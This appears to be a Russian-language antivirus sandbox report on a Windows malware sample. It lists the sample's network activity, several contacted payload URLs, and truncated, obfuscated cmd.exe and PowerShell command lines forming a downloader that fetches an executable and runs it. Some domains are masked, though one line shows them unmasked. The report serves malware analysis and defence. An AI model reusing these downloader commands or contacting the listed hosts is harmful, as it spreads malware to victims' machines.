Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe /V:/C"set 7yu= }}{hctac}}kaerb;ilT$ ssecorP-tratS;)ilT$(elifotevas.Obi$;)ydoBesnopser.drO$(etirw.Obi$;1 = epyt.Obi$;)(nepo.Obi${ )'*ZM*' ekil- txetesnopser...
Сетевая активность
Подключается к
- 'un####ngtoycon.mx':80
- 'th####loflife.com':80
- 'jo#####ighvoltage.com':80
- 'th#####ningspace.com':80
TCP
Запросы HTTP GET
- http://un####ngtoycon.mx/WX2IrOV
- http://th####loflife.com/TXA
- http://www.jo#####ighvoltage.com/vGFa3u
- http://th#####ningspace.com/m
UDP
- DNS ASK un####ngtoycon.mx
- DNS ASK th####loflife.com
- DNS ASK jo#####ighvoltage.com
- DNS ASK th#####ningspace.com
- DNS ASK pe##s56.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe /V:/C"set 7yu= }}{hctac}}kaerb;ilT$ ssecorP-tratS;)ilT$(elifotevas.Obi$;)ydoBesnopser.drO$(etirw.Obi$;1 = epyt.Obi$;)(nepo.Obi${ )'*ZM*' ekil- txetesnopser...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"set 7yu= }}{hctac}}kaerb;ilT$ ssecorP-tratS;)ilT$(elifotevas.Obi$;)ydoBesnopser.drO$(etirw.Obi$;1 = epyt.Obi$;)(nepo.Obi${ )'*ZM*' ekil- txetesnopser.drO$( fI;)(dnes.drO$;...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo powershell $SjL='NEi';$tuG='http://un####ngtoycon.mx/WX2IrOV@http://thereeloflife.com/TXA@http://www.jordanhighvoltage.com/vGFa3u@http://thelearningspace.com/m@http://pegas56.ru/...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "tokens=3 delims=M.UV" %I IN ('assoc.psm1') DO %I -"
- '<SYSTEM32>\cmd.exe' /c assoc.psm1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =NEi
